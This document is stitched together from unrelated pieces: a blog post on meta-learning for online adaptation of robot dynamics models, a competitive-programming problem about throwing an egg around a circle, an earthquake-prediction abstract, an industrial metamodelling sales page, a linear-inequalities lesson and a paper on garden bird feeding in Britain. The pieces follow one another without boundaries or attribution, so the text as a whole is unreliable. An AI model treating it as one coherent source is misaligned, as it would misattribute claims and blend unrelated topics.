Fig 11. The ability to draw from prior knowledge as well as to learn from recent knowledge enables GrBAL (ours) to clearly outperform both MB and MB+DE when tested on environments that (1) require online adaptation and/or (2) were never seen during training.
This work enables online adaptation of high-capacity neural network dynamics models, through the use of meta-learning. By allowing local fine-tuning of a model starting from a meta-learned prior, we preclude the need for an accurate global model, as well as allow for fast adaptation to new situations such as unexpected environmental changes. Although we showed results of adaptation on various tasks in both simulation and hardware, there remain numerous relevant avenues for improvement.
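The adaptation step at the heart of this approach can be illustrated with a toy sketch. The linear model and variable names below are our own simplifications, standing in for the neural network dynamics model in the paper: starting from a meta-learned prior, we take one gradient step on the most recent transitions to obtain adapted parameters.

```python
import numpy as np

def adapt_online(theta_prior, recent_X, recent_Y, lr=0.1):
    """One gradient step on the M most recent transitions, starting from the
    meta-learned prior. theta maps [state, action] features to the next state."""
    pred = recent_X @ theta_prior
    grad = (2.0 / len(recent_X)) * recent_X.T @ (pred - recent_Y)  # grad of MSE
    return theta_prior - lr * grad

# Toy check: the true dynamics shift (e.g. a leg breaks), and adapting from
# the prior reduces one-step prediction error on the recent data.
rng = np.random.default_rng(0)
theta_prior = np.eye(3)                  # stand-in for meta-learned weights
theta_true = 0.7 * np.eye(3)             # perturbed real dynamics
X = rng.normal(size=(16, 3))             # recent [state, action] inputs
Y = X @ theta_true                       # observed next states
theta_star = adapt_online(theta_prior, X, Y)
err_before = float(np.mean((X @ theta_prior - Y) ** 2))
err_after = float(np.mean((X @ theta_star - Y) ** 2))
assert err_after < err_before
```

In the actual method this inner update is what gets meta-trained: the prior is optimized so that one such gradient step is maximally effective.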
First, although this setup of always fine-tuning from our pre-trained prior can be powerful, one limitation of this approach is that seeing a new setting numerous times results in the same performance as seeing it for the first time; the agent does not improve with repeated exposure. In follow-up work, we take steps to address precisely this issue of improving over time, while simultaneously not forgetting older skills as a consequence of experiencing new ones.
Another area for improvement includes formulating conditions or an analysis of the capabilities and limitations of this adaptation: what can or cannot be adapted to, given the knowledge contained in the prior? For example, consider two humans learning to ride a bicycle who suddenly experience a slippery road. Assume that neither of them has ridden a bike before, so they have never fallen off a bike before. Human A might fall, break their wrist, and require months of physical therapy. Human B, on the other hand, might draw from his/her prior knowledge of martial arts and thus implement a good “falling” procedure (i.e., roll onto your back instead of trying to break a fall with the wrist). This is a case where both humans are trying to execute a new task, but other experiences from their prior knowledge significantly affect the result of their adaptation attempt. Thus, having some mechanism for understanding the limitations of adaptation, under the existing prior, would be interesting.
We would like to thank Sergey Levine and Chelsea Finn for their feedback during the preparation of this blog post. We would also like to thank our co-authors Simin Liu, Ronald Fearing, and Pieter Abbeel. This post is based on the following paper:
- Learning to Adapt in Dynamic, Real-World Environments Through Meta-Reinforcement Learning
A Nagabandi*, I Clavera*, S Liu, R Fearing, P Abbeel, S Levine, C Finn
International Conference on Learning Representations (ICLR) 2019
Arxiv, Code, Project Page
This article was initially published on the BAIR blog, and appears here with the authors’ permission.
Game of Throwns
Daenerys frequently invents games to help teach her second grade Computer Science class about various aspects of the discipline. For this week’s lesson she has the children form a circle and (carefully) throw around a petrified dragon egg.
The $n$ children are numbered from $0$ to $n - 1$ (it is a Computer Science class after all) clockwise around the circle. Child $0$ always starts with the egg. Daenerys will call out one of two things:
a number $t$, indicating that the egg is to be thrown to the child who is $t$ positions clockwise from the current egg holder, wrapping around if necessary. If $t$ is negative, then the throw is to the counter-clockwise direction.
the phrase undo $m$, indicating that the last $m$ throws should be undone. Note that undo commands never undo other undo commands; they just undo commands described in item $1$ above.
For example, if there are $5$ children, and the teacher calls out the four throw commands 8 -2 3 undo 2, the throws will start from child $0$ to child $3$, then from child $3$ to child $1$, then from child $1$ to child $4$. After this, the undo 2 instructions will result in the egg being thrown back from child $4$ to child $1$ and then from child $1$ back to child $3$. If Daenerys calls out $0$ (or $n, -n, 2n, -2n$, etc.) then the child with the egg simply throws it straight up in the air and (carefully) catches it again.
Daenerys would like a little program that determines where the egg should end up if her commands are executed correctly. Don’t ask what happens to the children if this isn’t the case.
Input consists of two lines. The first line contains two positive integers $n$ $k$ ($1\leq n \leq 30$, $1 \leq k \leq 100$) indicating the number of students and how many throw commands Daenerys calls out, respectively. The following line contains the $k$ throw commands. Each command is either an integer $p$ ($-10\, 000 \leq p \leq 10\, 000$) indicating how many positions to throw the egg clockwise or undo $m$ ($m \geq 1$) indicating that the last $m$ throws should be undone. Daenerys never has the kids undo beyond the start of the game.
Display the number of the child with the egg at the end of the game.
Sample Input 1:
5 4
8 -2 3 undo 2

Sample Output 1:
3
Sample Input 2:
5 10
7 -3 undo 1 4 3 -9 5 undo 2 undo 1 6

Sample Output 2:
2
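A straightforward way to solve this (our sketch, not part of the problem statement) is to keep a stack of the throws that have not yet been undone, so that an undo command simply pops the most recent throws and reverses them:

```python
def final_child(n, tokens):
    """Return the final egg holder; `tokens` is the command line split on spaces."""
    history = []                 # throws that have not been undone
    pos = 0                      # child 0 starts with the egg
    i = 0
    while i < len(tokens):
        if tokens[i] == "undo":
            for _ in range(int(tokens[i + 1])):
                pos = (pos - history.pop()) % n   # throw the egg back
            i += 2
        else:
            t = int(tokens[i])
            history.append(t)
            pos = (pos + t) % n                   # wraps for negative t too
            i += 1
    return pos

print(final_child(5, "8 -2 3 undo 2".split()))    # -> 3
```

Python's `%` operator returns a non-negative result for a positive modulus, so counter-clockwise (negative) throws wrap correctly without a special case.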
Article type: Research
1 Department of Industrial Engineering, Tarbiat Modares University
2 International Institute of Earthquake Engineering and Seismology
Article title [English]
Iran is known as one of the high-risk seismic regions of the world. Over the past 50 years, many destructive earthquakes have occurred in this area, causing great loss of life and financial damage. So, from the perspective of emergency management and hazard preparedness, it is essential to make an effort to predict earthquake occurrence. Earthquake prediction is an instance of interdisciplinary research, and a concern of many scientists in various fields, such as geology, seismology, engineering, mathematics, computer science and even the social sciences, who study different aspects of the matter to find new solutions. Efforts in this field are divided into long-term and short-term predictions. Short-term predictions are based on precursors such as foreshocks, seismic quiescence, decreases in radon concentrations and other geochemical phenomena. Due to numerous complexities and unknown factors inside the earth, exact prediction of earthquakes is difficult and practically impossible. During the last two decades, many techniques have been developed to discover patterns in seismic data and predict three earthquake parameters, namely the time of occurrence, location and magnitude of future earthquakes. Soft computing and data mining techniques, such as neural networks, fuzzy logic and clustering methods, are appropriate tools for problems, such as earthquake prediction, that suffer from inherent complexities. Many researchers have used these approaches to reduce uncertainty in results.
In this paper, the b-value of the Gutenberg-Richter law has been considered as a precursor for earthquake prediction. Prior to earthquakes of magnitude $M_w \geq 6.0$, the temporal variation of the b-value has been examined in Qeshm island and neighboring areas in the south of Iran, from 1995 to 2012. Clustering, by the k-means algorithm and a self-organizing map (SOM), has been undertaken to find a pattern in the variation of the b-value. Three clusters are obtained as the optimum number of clusters by the Silhouette index and the Davies-Bouldin index. Prior to all the mentioned earthquakes $(M_w\geq 6.0)$, a cluster characterized by a decrease in the b-value has been seen; so, a decrease in the b-value before main shocks has been considered a distinctive pattern. Also, an approximate time of decrease has been determined.
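As an aside, the b-value can be estimated from a magnitude catalogue with Aki's maximum-likelihood formula, b = log10(e) / (mean(M) - Mc), where Mc is the magnitude of completeness. The sketch below uses synthetic magnitudes (not the Qeshm catalogue) to illustrate the estimator:

```python
import numpy as np

def b_value(magnitudes, m_c):
    """Aki's maximum-likelihood estimate of the Gutenberg-Richter b-value."""
    m = np.asarray(magnitudes)
    m = m[m >= m_c]                      # keep only events above completeness
    return np.log10(np.e) / (m.mean() - m_c)

# Synthetic catalogue: above M_c, magnitudes follow an exponential law with
# rate b * ln(10); the true b here is 1.0, a typical crustal value.
rng = np.random.default_rng(42)
m_c = 2.0
mags = m_c + rng.exponential(scale=1.0 / (1.0 * np.log(10)), size=20000)
print(round(float(b_value(mags, m_c)), 2))   # close to 1.0
```

A temporal b-value series, as analysed in the paper, would apply this estimator to a sliding window of events before clustering the resulting values.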
Multivariate metamodelling is a way to make simplified models of mechanistic models that can be run faster and are more interpretable. This opens up a set of possibilities for how to use already existing mechanistic models to optimize processes and improve understanding.
Our Multivariate Metamodelling methods allow our customers to:
Mechanistic, or theory driven models, are widely used to describe behavior of a system based on known theory. These mathematical models could be for furnaces in the metallurgy industry, wind turbines, spread of infectious diseases, or the cardiovascular system. Examples: Finite element models of heat diffusion or electrical fields, differential equations of reaction kinetics, or computational fluid dynamic models of turbulence in gases or liquids.
A good mechanistic model describes essential properties and behaviors, according to the laws of physics within the selected process design. Such a model is a valuable source of prior knowledge, especially about how the system will behave under conditions where you don’t even WANT to have observational data, for example situations that cause harm to equipment or personnel.
Mechanistic mathematical models often encapsulate deep prior knowledge of domain experts. However, mechanistic models may be slightly oversimplified – they often do not take all possible interactions between the parameters into account. Still, they do describe valuable insight about how the laws of physics determine the input-output relationships of the system, and how the system was intended to function.
One other issue is that many of the coefficients that are built into the mechanistic/first principle models are estimated from certain experiments that might not have a general applicability, but represent a “best estimate”. This might introduce some bias in the models, so that they cannot be extrapolated uncritically to other similar but not identical applications.
Mechanistic models are often used for design of processes and assets. But today, they are seldom used in the operations phase. One reason is that they are often slow to compute and difficult to fit to streams of process measurements. Another reason is that a model is no longer trusted – maybe there were discrepancies between the planned “design” in the model and what was actually “built”, or perhaps the model has not been updated with later furnace modernizations. Raw materials and operating conditions also change over time, reducing fit with the original mechanistic model.
So, theory-driven mechanistic models might not be perfect. But they can be supplemented by data-driven models based on actual process measurements. This is called “hybrid modelling”: it combines mechanistic and data-driven modelling, exploiting the advantages of each while avoiding their disadvantages.
A multivariate metamodel is a simplified description of the output behavior of a mechanistic model under different input conditions. When building a metamodel, we need to describe the mechanistic model’s behavior. This means running the mechanistic model repeatedly under different conditions, making sure that the relevant range of conditions are included.
The model inputs (various combinations of relevant system design descriptions, parameter values, initial conditions and computational controls) are chosen so that the model outputs are representative of the use case of interest, as well as of unwanted but possible deviations from it. This set of computer simulations with the mechanistic model needs to be done only once.
In Idletechs we do this through our highly efficient experimental designs, to make the most cost-effective computer simulations of parameter combinations, spanning the whole relevant range of behavior with respect to the important statistical properties. Read more in Design of Experiments
The input-output relationship from the simulated data from the mechanistic model are described with the same methods that are used for modelling the relationship between empirical measurements of input and output. These so-called subspace regression methods, extensions of methods originally developed in the field of chemometrics (ref H. Martens & T Næs (1989) Multivariate Calibration. J. Wiley & Sons Ltd. Chichester UK), are fast to compute, give good input-output prediction models and are designed to give users a graphical overview and provide insight.
The laws of physics as implemented in the mechanistic model still apply in the obtained metamodels of the mechanistic model’s behavior. Only now the computations of outputs from inputs can run thousands of times faster, and without risk of local minima or lack of convergence.
Multivariate metamodelling can be used for a range of applications:
Most mechanistic models define how a system’s outputs depend on its inputs according to theory:
\(Outputs \approx F(Inputs)\)
The metamodel of such a theoretical, mechanistic mathematical model is a simpler statistical approximation model:
\(Outputs \approx f(Inputs)\)
A metamodel in this causal direction is guaranteed to give good descriptions of the mechanistic model’s outputs from its combination of inputs. Such a metamodel gives quantitative predictions and graphical insight into what are the most critical elements and stages hidden inside the mechanistic model itself. The user gets information at three levels:
Example: The known operating conditions of a furnace (e.g. electrode control, input current, raw material charge and cooling rate) predicts the inner, hidden position of the electrode tip, or the outer surface temperature and electromagnetic field.
Example: How certain combinations of operating conditions of the furnace should be able to predict its inner or outer properties.
Example: Why a combination of electrode control, input current and raw material charge seem to affect a combination of electrode tip and outer electromagnetic field, while a different combination of input current and cooling capacity seem to affect the surface temperature distribution.
In other words: the many input/output variations form distinct patterns of causality that can be monitored in real time, in particular if the model is fitted fast enough to relevant measurements.
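The forward metamodelling workflow described above can be sketched in a few lines of Python. The toy "mechanistic model" and the quadratic least-squares surrogate below are illustrative stand-ins for a real simulator and for the bilinear subspace regressions we use: simulate once over designed inputs, fit a fast surrogate, then predict new outputs with a single matrix product.

```python
import numpy as np

def mechanistic_model(x):
    """Toy stand-in for a slow simulator: 3 inputs -> 2 outputs."""
    q, T, c = x
    return np.array([q * np.exp(-c / 10.0), 0.5 * T + 0.1 * q * T])

# 1) Run the simulator once over a designed set of input conditions.
rng = np.random.default_rng(1)
X = rng.uniform(0.0, 1.0, size=(200, 3))
Y = np.array([mechanistic_model(x) for x in X])

# 2) Fit a fast surrogate: least squares on quadratic features
#    (a simple stand-in for bilinear subspace regression).
def features(X):
    quad = np.hstack([X[:, [i]] * X[:, [j]] for i in range(3) for j in range(i, 3)])
    return np.hstack([np.ones((len(X), 1)), X, quad])

B, *_ = np.linalg.lstsq(features(X), Y, rcond=None)

# 3) The metamodel now predicts new outputs with one matrix product.
X_new = rng.uniform(0.0, 1.0, size=(50, 3))
Y_true = np.array([mechanistic_model(x) for x in X_new])
Y_hat = features(X_new) @ B
print(float(np.max(np.abs(Y_hat - Y_true))))   # small approximation error
```

Step 1 is the expensive part and is done once; after that, step 3 replaces every call to the simulator with a cheap linear-algebra operation.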
Many mechanistic mathematical models are highly informative, but too slow for real-time updating. Examples: Nonlinear spatiotemporal dynamics of e.g. metallurgical reactions, or heating and cooling processes. A metamodel of such a slow mechanistic model may be developed to mimic its input/output behavior and make the computations much faster and more understandable.
To establish a metamodel of a mechanistic model requires some computer simulation work (mostly automatic) and some multivariate data analysis (requires our expertise). But this work is done once and for all. Once established, our metamodels run very fast, due to their mathematical form (low-dimensional bilinear subspace regressions).
Moreover, each time the original non-linear model is applied, it may give computational problems, such as local minima and lack of convergence. In contrast, its bilinear metamodel does not suffer in this way, since those problems were already dealt with during metamodel development.
Various predicted Outputs predicted from a metamodel, e.g. the surface temperature distribution of an engine, may be compared to actually measured profiles of these Outputs, e.g. continuous thermal video monitoring of that engine. This allows us to infer the unknown causal Inputs – inner states and parameter values like unwanted changes in the inner combustion, heat conductivity or cooling of the engine.
One way to attain this is to search for already computed Output combinations that resemble the measured Output profile, starting with the previous simulation results.
But an even faster approach is also possible. In many cases it may be even more fruitful to invert the modelling direction, compared to the causal direction Output=f(Inputs):
\(Inputs \approx g(Outputs)\)
That can give an exceptionally fast way to predict unknown input conditions and inner process states from real-time output measurements.
In addition, the metamodel will automatically give warning of abnormality if it detects discrepancies between the predicted and measured temperature distribution of the engine surface. This facility is very sensitive, since it ignores patterns of variation that have already been determined to be OK.
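This warning mechanism can be sketched as a simple residual check (illustrative only; the threshold and the residual scale would in practice be estimated from normal operating data):

```python
import numpy as np

def abnormality_warning(y_measured, y_predicted, normal_scale, k=3.0):
    """Warn when the measured output profile deviates from the metamodel
    prediction by more than k times the residual scale of normal operation."""
    residual = np.linalg.norm(np.asarray(y_measured) - np.asarray(y_predicted))
    return bool(residual > k * normal_scale)

y_pred = np.array([80.0, 82.0, 85.0])   # metamodel-predicted surface temperatures
print(abnormality_warning([80.5, 81.8, 85.1], y_pred, normal_scale=0.5))  # False
print(abnormality_warning([80.5, 96.0, 85.1], y_pred, normal_scale=0.5))  # True
```

Because the metamodel already accounts for the known, acceptable variation patterns, even a small residual threshold can be used without triggering false alarms.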
Combine metamodel outputs with empirical measurements for a hybrid modelling approach that combines “the best of both worlds” and models the process as it really is.
Improving the process knowledge and also the mechanistic model.
It is generally a good idea to bring background knowledge into the interpretation of process measurements. Even though the boundary conditions may have changed, the laws of physics are the same.
Improving your old mechanistic model
The so-called subspace regression models also provide automatic outlier detection if and when new, unexpected process variation patterns develop in the measurements. These new pattern developments are used to generate warnings to the operators. Moreover, process properties that have changed are revealed and corrected, in terms of model parameter settings that appear to have changed relative to what you expected. Thereby the combined meta-/data-modelling process helps you update the parameter values in your old mechanistic model.
But in addition, your old mechanistic model may not only be updated, but also expanded in this process: unexpected, new variation patterns in the hybrid can be analyzed in more depth, in terms of mechanistic mathematical equations, e.g. differential equations between the inner states, known or unknown, of your process. These model elements may be grafted onto the original mechanistic model, just like a new branch may be grafted onto the trunk of an old fruit tree. Thereby, your old mechanistic model becomes fully adapted to more modern times.
Some mechanistic models display an apparent weakness: Several different combinations of Input conditions can give more or less the same Output profile:
\(F(Inputs_1) \approx F(Inputs_2) \approx … F(Inputs_N) = Outputs\)
This means that the mechanistic model is mathematically ambiguous, in the sense that different input combinations may cause the system to behave in the same way.
Such a collection of parameter combinations with more or less equal effects on the system is called a “neutral parameter set”. And a mechanistic model with neutral parameter sets is called “mathematically sloppy”.
However, in an industrial setting, this apparent weakness may be turned into a great advantage. Assume that this ambiguity is a property of the physical system itself (e.g. a furnace or an engine), and not just due to an error in its mechanistic model.
Assume also that there are multiple key performance indicators (KPIs) for a given system. Maybe there are ways to optimize one key KPI, \(KPI_{Key}\), without sacrificing the others, \(KPI_{Other}\)?

Then, for a process where a good mechanistic model shows such an ambiguity, its metamodel may list a range of different input combinations that change \(KPI_{Key}\) while not affecting \(KPI_{Other}\).

Seeing this type of ambiguity may allow you to find ways to optimize the input conditions with respect to \(KPI_{Key}\) without affecting the other desired process outputs significantly. For instance, by studying the sloppiness of the mechanistic model (its many-inputs-to-one-output behavior, e.g. discovered via its metamodel) you may find new ways to run an engine that reduce CO2 emissions or fuel cost without sacrificing engine power. Or new and less risky ways to control the electrode positioning in a furnace without affecting its productivity.
Idletechs helps you to combine valuable information from both the mechanistic model (via its metamodel) and from modern measurements (e.g. thermal cameras etc), in a way that is understandable for operators and experts alike.
One of the essential tools in meta- and hybrid modelling is Design of Experiments (DoE). Proper use of DoE ensures that the parameter space of the mechanistic and simulation-based models is described with a minimum number of combinations of the parameters of interest, i.e. the best subset of experimental runs. The traditional analysis of results from DoE, ANalysis Of VAriance (ANOVA), yields statistical inference w.r.t. the importance of the parameters, and distinguishes real effects from noise. The multivariate subspace models give detailed insight into the relationships between samples and variables from experimental designs, specifically in situations with multiple outputs. Yet another important aspect in this context is that one can a priori estimate the danger of overlooking real effects by means of power estimation. No experiments should be performed before there exists an estimate of the uncertainty in the outputs of the model.
Furthermore, DoE will also clarify possible interaction effects which may not initially have been considered in the mechanistic models. Derived input and output parameters might be added by so-called feature engineering: adding transforms of the initial parameters based on domain-specific knowledge and theory. Temperature, for example, rarely affects a process in a linear way. Modern optimal designs also allow the definition of constraints known in the system under observation, e.g. that some combinations of parameters will give a fatal outcome of the process. After the initial model has been established, the model can be numerically and graphically optimized, which is the basis for one or more confirmation runs for verification.
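As a minimal illustration of DoE (a two-level full factorial design, the simplest case; real applications would use optimal designs with constraints, as described above), the sketch below generates a coded design and estimates main effects from the responses. The response function is invented for the example.

```python
import itertools
import numpy as np

def full_factorial(n_factors):
    """All 2^n combinations of coded low/high (-1/+1) factor levels."""
    return np.array(list(itertools.product([-1, 1], repeat=n_factors)))

design = full_factorial(3)   # 8 runs for 3 factors A, B, C
# Pretend responses from running the process at each design point:
# y = 10 + 3*A - 2*B (factor C has no effect), with no noise.
y = 10 + 3 * design[:, 0] - 2 * design[:, 1]
# Main effect of a factor = mean response at high level - mean at low level.
effects = [float(y[design[:, j] == 1].mean() - y[design[:, j] == -1].mean())
           for j in range(3)]
print(effects)   # [6.0, -4.0, 0.0]
```

With noisy responses, ANOVA would then be used to decide which of these effects are statistically distinguishable from noise.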
Graphing Systems of Linear Inequalities
Graphing Systems of Linear Inequalities involves two inequalities in two variables x and y.
To graph systems of inequalities we use the Cartesian plane, or XY-plane. A vertical line divides the plane into left and right parts, and a slanting (oblique) line divides the plane into upper and lower parts. A point in the Cartesian plane will either lie on a line or lie in one of these parts.
Steps to graph a system of inequalities
(i) Solve the given inequality for y, following the rules for inequalities (remember to reverse the inequality sign when multiplying or dividing both sides by a negative number).
(ii) Graph the equation either using function table or using slope and y-intercept.
(iii) If the inequality is strict (< or >), graph a dotted line and if the inequality is not strict ($\geq or \leq$ ), draw a solid line.
(iv) Apply the Origin test
Origin Test: Put x = 0 and y = 0 in the solved inequality. If the resulting statement is true, then the origin (0,0) is included in the region; if it is false, then shade the region that does not include the origin.
Lightly shade the half-plane that is the graph of the inequality. Colored pencils may help you distinguish the different half-planes.
Graph both equations using the above rules and mark each region accordingly. For marking, use two different colored pencils, or a dark and a light shade, to distinguish the two regions. The intersection (overlapping region) formed by both inequalities is the solution region.
Examples on graphing systems of linear inequalities
Example 1:
Graph the system : y $\geq$ -3x - 2 and y < x + 3
y $\geq$ -3x - 2 ---------(1)
and y < x + 3 ------- (2)
Graph the 1st and 2nd equations using the slope and y-intercept.
Now put x = 0 and y = 0 in the 1st equation ,
0 $\geq$ - 3(0) -2
0 $\geq$ -2
which is true, so the origin is included for the 1st inequality.
So after graphing the equation, we mark the region to the right of the line, which includes the origin.
2nd equation ⇒
0 < 0 + 3
0 < 3
which is also true, so the origin is also included for the 2nd inequality.
So after graphing the equation, we mark the lower region of the line, which includes the origin.
From the above graphs we can see that in the first graph, region A is bounded by a solid line, as the inequality is not strict. In the second graph, region B is bounded by a dotted line, as the inequality is strict. In the third graph, regions A and B overlap, and region C is their intersection. So region C is the solution.
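We can also check the solution region of this example numerically (a small sketch; note that the strict inequality excludes points on the dashed line):

```python
def in_solution_region(x, y):
    """Check the worked example: y >= -3x - 2 (solid) and y < x + 3 (dashed)."""
    return y >= -3 * x - 2 and y < x + 3

print(in_solution_region(0, 0))    # True: the origin passes both tests
print(in_solution_region(0, 3))    # False: lies on the dashed line, excluded
print(in_solution_region(0, -3))   # False: below the solid line y = -3x - 2
```

This is exactly the origin test from the steps above, applied to any point instead of just (0,0).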
There is a multi-billion dollar global industry dedicated to feeding wild birds in residential gardens. This extraordinary boost to food resources is almost certainly reshaping entire bird communities, yet the large-scale, long-term impacts on community ecology remain unknown. Here we reveal a 40-year transformation of the bird communities using garden bird feeders in Britain, and provide evidence to suggest how this may have contributed to national-scale population changes. We find that increases in bird diversity at feeders are associated with increasing community evenness, as species previously rarely observed in gardens have increasingly exploited the growing variety of foods on offer over time. Urban areas of Britain are consequently nurturing growing populations of feeder-using bird species, while the populations of species that do not use feeders remain unchanged. Our findings illustrate the on-going, gross impact people can have on bird community structure across large spatial scales.
Food availability may be the single most important factor determining the size and distribution of animal populations. Winter food availability, in particular, plays a critical role in regulating bird populations in seasonal environments1, with over-winter survival a key cause of population change for many terrestrial bird species2,3,4. In much of Europe and North America, the deliberate provision of food in domestic gardens and yards (garden bird feeding) has modified the winter resource base for birds extensively5, helping to buffer against environmental drivers that operate through changes in natural food abundance6. In Britain, for example, homeowners are reportedly providing enough supplementary food to support approximately 196 million birds, far exceeding the combined, total population of many common garden species7. This massive human intervention is likely to be having profound repercussions on the bird communities around us5.
Early feeding pioneers attracted a relatively simple bird community to gardens using kitchen scraps and home-made table feeders5. However, the practice has changed substantially since becoming commercialised in the mid-20th century8. It now seemingly benefits a much broader bird community, although it is unclear whether or not some species may have lost out due to heightened interspecific competition for access to supplementary foods9,10. Previous research has demonstrated that the distribution of feeders across a city can predict avian abundance patterns for some species11, with bird community composition also reacting promptly to the introduction and removal of feeding stations12. This would suggest that garden bird feeding is capable of supporting local populations and enhancing bird numbers, at least in the short-term. The availability and nutritional value of anthropogenic foods are also likely to have substantial impacts (both positive and negative) on the health, survival and breeding outputs of wild birds3,13,14. But ultimately, how these effects scale up to influence bird community dynamics and population trajectories across entire landscapes is still unknown.
In Britain, gardens cumulatively account for approximately one quarter of all urban land cover15 and play an important role in supporting the national populations of many bird species16,17,18. Given our awareness that at least half of British homeowners feed the birds in their gardens7,19, and our growing understanding of the extensive ecological and evolutionary impacts of supplementary food use, it is reasonable to predict that garden bird feeding might also be influencing bird communities across large spatial scales. The supply and uptake of garden bird food during winter has been monitored throughout Britain since the 1970s, via the Garden Bird Feeding Survey (GBFS, Supplementary Fig. 1), providing a unique opportunity to study long-term shifts in bird communities in response to large-scale food supplementation. Here, first, we characterise real-time growth and innovation within the garden bird feeding industry. Then, using data extracted over a 40-year time series, we demonstrate that, over time, food resources provided by the British public have altered the composition of bird communities utilising garden bird feeders and, consequently, have helped to shape the national populations of birds in Britain today.
Results and Discussion
Garden bird feeding industry
To quantify long-term changes to garden bird feeding in Britain, we conducted a comprehensive review of advertising in Birds—a charity membership magazine reaching more than 2 million readers20—published between 1973 and 2005. By definition, the magazine’s audience have a keen interest in birds and their conservation, thus representing the target market for companies selling popular and novel feeding products. Since brand advertising is known to impact total industry demand21, advertising patterns in Birds are expected to provide meaningful indices of consumers’ garden bird feeding habits.
The proportion of advertising space dedicated to the bird feeding industry increased significantly over time (\(\chi _1^2\) = 26.19, df = 2.62, p < 0.001; Supplementary Fig. 2), indicating the rising popularity of feeding wild birds. After accounting for changes to advertising practices, we revealed upward trajectories in the total numbers of food (F = 178.1, df = 3.15, p < 0.001) and feeder (F = 187.9, df = 3.70, p < 0.001) products on offer, including exponential increases from 1980 onwards (Fig. 1; Supplementary Fig. 2). The number of food types available (\(\chi _1^2\) = 8.06, p = 0.005) and their diversity (Simpson’s Index, \(\chi _1^2\) = 7.26, p = 0.007) also grew significantly (Supplementary Table 1; Supplementary Fig. 2). Specialist foods, such as sunflower hearts and fat balls, first appeared in the 1990s (Fig. 1) as companies, supported by conservation bodies, deliberately diversified their products to attract more species5. This broadening of food resources, added to the potential for selective provisioning by homeowners, may have both influenced and complicated bird community responses to increases in food quantity.
Community changes at garden bird feeders
Using 40 years of GBFS data from 1973/74 to 2012/13, we identified 133 bird species using garden feeders during winter, equating to 52.6% of all species, excluding vagrants, found in Britain22 (Supplementary Table 2). We analysed the long-term trends in community composition, nationally (using a single, rarefied time-series) and within individual gardens (using mixed effects modelling), to examine evidence of bird community adaptation in response to evolving feeding practices (see Methods section).
Across Britain, there has been a highly significant increase in the diversity of birds using garden bird feeders since the 1970s, according to Simpson’s Diversity Index (F = 355.0, df = 3.52, p < 0.001; Fig. 2a). Although, nationally, the same suite of species have continued to use feeders over time (\(\chi _1^2\) = 0.00, p = 0.99; Fig. 2c), homeowners are encountering an increasingly species-rich (F = 143.5, df = 2.99, p < 0.001; Fig. 2d) and diverse (F = 123.0, df = 2.92, p < 0.001; Fig. 2b) community of birds visiting the feeders in their individual gardens.
This combination of large- (national-) and small- (garden-) scale patterns suggests that many species have become more abundant at garden feeders over time, potentially resulting in a change in species dominance within the feeder-using community. Indeed, a comparison of k-dominance curves from each year revealed a clear pattern of increasing evenness over time (Fig. 2e). Most notably, approximately half of all birds using feeders belonged to just two species in the 1970s, but by the 2010s, the number of species making up the same proportion of the community had more than tripled. We examined the possibility that this finding might purely reflect the changing spatial ranges of British birds23, potentially influencing community trends by bringing more wintering bird species in contact with monitored feeders over time. However, the median net change in the proportion of GBFS gardens located within a species’ range between 1981 and 2011 was only 2.49% (n = 130)24,25. This suggests that garden bird feeders, specifically, could be responsible for attracting more individuals across a greater species range as time has passed.
We used GBFS data on the numbers of hanging, table and ground feeding units (collectively termed feeders) to evaluate the importance of garden bird food availability in driving community patterns directly. As expected, individual homeowners supplied an increasing number of feeders (F1,6431 = 195.6, p < 0.001), particularly hanging feeders (F1,6431 = 297.2, p < 0.001), over time (Supplementary Fig. 3). It is reasonable to assume that this increase in feeder numbers also reflects the greater variety in food types that became available during the same timeframe, since homeowners are likely to aim to attract more species by diversifying food provision, rather than simply increasing provision of the same foods.
Changes in bird communities across the British countryside have previously been shown to be at least partially linked to climate change and urbanisation26,27. Indeed, variation in garden use by birds is also known to be associated with winter temperatures and local habitat characteristics18,28. But interestingly, when we included all of these potential drivers as covariates in the modelling of bird community temporal trends, we found that the number of feeders provided in a garden had a greater influence on species richness and diversity than either winter temperature or local habitat (Supplementary Fig. 4). It therefore seems that the broad temporal changes observed at garden bird feeders could be the result of the cumulative changes in food provisioning across multiple gardens, allowing species rarely observed at the start of the time-series to take better advantage of feeders over time.
Well-defined interspecific dominance hierarchies are known to exist at bird feeders, as species of different sizes and competitive strengths compete for access to food supplements9,29. Our findings suggest that increasing the number of feeders available in gardens has reduced the capacity for resource monopolisation by any one species. Concurrent increases in the diversity of food and feeder types on offer are also likely to have led to greater opportunities for species with more specialist foraging requirements. To this end, the continuing modifications made by homeowners to their feeding practices appear to have contributed significantly to the changing composition of bird communities in gardens.
Links to national population change
It would seem that the composition of bird communities exploiting garden bird food has changed in parallel with evolving feeding practices. More generally, community changes in terrestrial birds are likely to be the product of many different factors, including climate, habitat change, resource availability, conditions in breeding/wintering grounds or on migration, disease, competition and predation. Indeed, as previously mentioned, wider community changes have occurred across Britain27, and therefore it is feasible that apparent increases in feeder use could merely reflect the greater detection of birds whose populations have grown through a mechanism unrelated to garden bird feeding. So, are changing feeder communities simply reflecting these wider patterns18, or could feeding actually be a driver of population change?
To answer this, first, we needed evidence that there is a real association between the use of garden bird feeders during winter and concurrent changes in species’ population sizes. Species that regularly visit garden feeders are most likely to experience population-level impacts of supplementary food use. Therefore, we identified 39 species that regularly visit garden feeders (feeder-users) and tested whether independent estimates of their national breeding population trends, derived from Massimino et al.30, could be linked to shifting winter feeder usage. Feeder use—the proportion of gardens where each species used feeders—increased by an average of 14.9% (s.e.m. 4.0%) between 1973 and 2012, with two thirds of species showing a significant positive change (Fig. 3a; Supplementary Table 3). Further, these changes were found to be significantly associated with national population changes over the same timeframe (r2 = 0.43, F1,29 = 21.82, p < 0.001; Fig. 3b). We accounted for phylogeny in our analysis, under the assumption that more closely related species would be more similar in their tendency to use feeders and in the extent to which their populations change. Indeed, the estimate of Pagel’s lambda (a measure of the phylogenetic signal) for species population change was significantly different from zero (λ = 0.94, p = 0.014). However, there was no evidence that feeder use was influenced by phylogeny (λ < 0.001, p = 0.15), and the optimised lambda value from the regression model (λ < 0.001) denotes very limited covariance between feeder use and species’ population change (distinct from the explanatory power of feeder use per se). Feeder use is typically associated with passerine birds5, but, with use of supplementary food evident across the phylogenetic tree (Supplementary Fig. 5), these findings give a strong indication that the proliferation of feeder use within bird communities is independent of species’ inter-relatedness.
